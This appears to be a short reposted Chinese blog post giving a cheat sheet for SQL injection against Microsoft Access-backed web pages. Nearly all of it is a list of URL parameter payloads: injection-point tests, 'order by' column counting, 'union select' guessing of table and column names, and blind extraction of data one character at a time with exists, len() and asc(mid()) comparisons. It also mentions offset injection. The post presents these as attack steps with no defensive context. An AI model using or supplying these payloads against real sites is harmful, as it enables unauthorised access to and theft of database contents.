sql注入--access
Posted 喋云怡雪
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入--access相关的知识,希望对你有一定的参考价值。
access数据库结构:
表名 --> 列名 --> 数据
access注入攻击片段
联合查询法:
(1) 判断注入点: ?id=1 and 1=1 ; ?id=1 and 1=2
(2) 猜解表长度: ?id=1 order by 3
(3) 猜解表名: ?id=1 union select 1,2,3 from 表名
(4) 猜解列名: ?id=1 union select 列名,2,3 from 表名
(5) 猜解数据
逐字猜解法:
(1) 查表:?id=1 and exists (select * from 表名)
(2) 查列:?id=1 and exists (select 列名 from 表名)
(3) 查数据:1.确定长度
?id=1 and (select top 1 len(列名) from 表名)=5
2.确定asc数据(asc编码)
?id=1 and (select top 1 asc(mid(列名,位数,1)) from 表名)=97
其他方法:
(1)字典文件收集(社工)
(2)Access偏移注入
以上是关于sql注入--access的主要内容,如果未能解决你的问题,请参考以下文章